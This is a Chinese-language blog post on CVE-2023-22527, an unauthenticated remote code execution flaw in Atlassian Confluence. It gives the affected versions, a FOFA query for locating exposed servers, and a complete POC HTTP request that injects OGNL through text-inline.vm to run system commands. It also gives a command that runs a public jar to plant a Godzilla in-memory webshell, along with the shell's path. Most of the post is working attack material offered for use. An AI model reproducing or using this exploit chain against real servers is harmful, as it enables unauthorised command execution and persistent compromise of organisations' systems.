CVE-2023-22527
## 简介 Atlassian Confluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。攻击者可在无需登录的情况下,利用该漏洞构造恶意请求,导致远程代码执行。 ## 影响版本 - 8.5.0 ~ 8.5.3 - 8.0.x ~ 8.4.x ## FOFA ``` 合流8.5.1 ``` ![](https://blog.coolcooltomato.com/uploads/article/CVE-2023-22527-1.png) ## 漏洞利用 ### POC数据包 ``` POST /template/aui/text-inline.vm HTTP/1.1 Content-type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: 127.0.0.1 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 375 Connection: close label=aaa\u0027%2b#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.poc[0],{})%2b\u0027&poc=@org.apache. struts2.ServletActionContext@getResponse().setHeader('Cmd-Responses-Header',(new freemarker.template.utility.Execute()).exec({"id"})) ``` 执行`id`命令 ![](https://blog.coolcooltomato.com/uploads/article/CVE-2023-22527-2.png) ### 内存注入 Github:https://github.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL 运行jar包: ``` java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://xxxx/ a b ``` ![](https://blog.coolcooltomato.com/uploads/article/CVE-2023-22527-3.png) ### 哥斯拉连接 shell位置: ``` /browsepeople.action ``` ![](https://blog.coolcooltomato.com/uploads/article/CVE-2023-22527-4.png) ![](https://blog.coolcooltomato.com/uploads/article/CVE-2023-22527-5.png)
创建时间:2024-02-27
|
最后修改:2024-02-27
|
©允许规范转载
酷酷番茄
首页
文章
友链